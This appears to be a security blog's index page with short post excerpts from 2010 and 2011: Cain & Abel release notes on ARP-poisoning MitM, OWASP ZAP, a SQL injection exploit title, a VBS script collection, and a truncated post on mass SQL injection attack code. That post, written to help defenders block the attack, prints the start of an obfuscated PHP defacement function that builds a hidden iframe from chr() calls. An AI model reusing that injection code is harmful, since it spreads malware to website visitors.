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Cain & Abel v4.9.37 released Cain & Abel v4.9.37 released - Added TCP/UDP Large Send Offloading status detection on Windows Vista/Seven. - Better handling of APR-SSL MitM threads. - Fixed a problem with APR in Windows7 causing attacker's machine to be isolated from poisoned hosts. - Speed improvement in Credential Manager Password Decoder for x64 operating systems. User Manual - http://www.oxid.it/ca_um/ 2011. 1. 25.
OWASP Zed Attack Proxy Project The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who a new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerab.. 2011. 1. 13.
TechShop Technote 7 SQL Injection Vulnerability # Exploit Title: Technote7(Commercial Version, Free Version) 2011. 1. 6.
VBS 활용한 다양한 소스코드 昨天为了解密那个加密的vbs脚本,在网上查找资料的时候发现好多经典的vbs代码,收集起来也为了以后学习。 VBS脚本用途很多: 1. 计算 2. 处理文件和文件夹 3. 管理Windows 4. 处理Word, Excel, PowerPoint等Office文档 5. 嵌入网页,驱动dHTML 6. 编写HTTP通信 7. 调用系统功能(COM组件),比如说语音说话 8. 分析HTML, XML 9. 调用命令行并分析返回结果 10. 处理图片 11. 自动化按键 12. 调用Windows Media Player并管理 13. 调用Windows Live Messenger并管理 14. 服务端技术:Active Server Page (ASP) 15. 脚本病毒 16. 处理数据库 下面是我收集的VBS代码,大部分转自gangzi.org,以后还会更新。 VBS获取系统安装.. 2010. 12. 29.
Mass SQL Injection Attack Code (PHP, MySQL) * 홈페이지 변조 및 Mass SQL Injection을 통해 대량 악성코드 유포 발생 - 최근 공격 코드 유형 파악해서 차단이나 알람 대응 필요 # 홈페이지 변조 코드 function gmfun($path){$daima=chr(60).chr(105).chr(102).chr(114).chr(97).chr(109).chr(101).chr(32).chr(115).chr(114).chr(99). chr(61).chr(38).chr(35).chr(120).chr(54).chr(56).chr(59).chr(38).chr(35).chr(120).chr(55).chr(52).chr(59). chr(38).chr(35).chr(120).chr(55).chr(52).chr(59).chr(38).chr(35).chr(12.. 2010. 12. 28.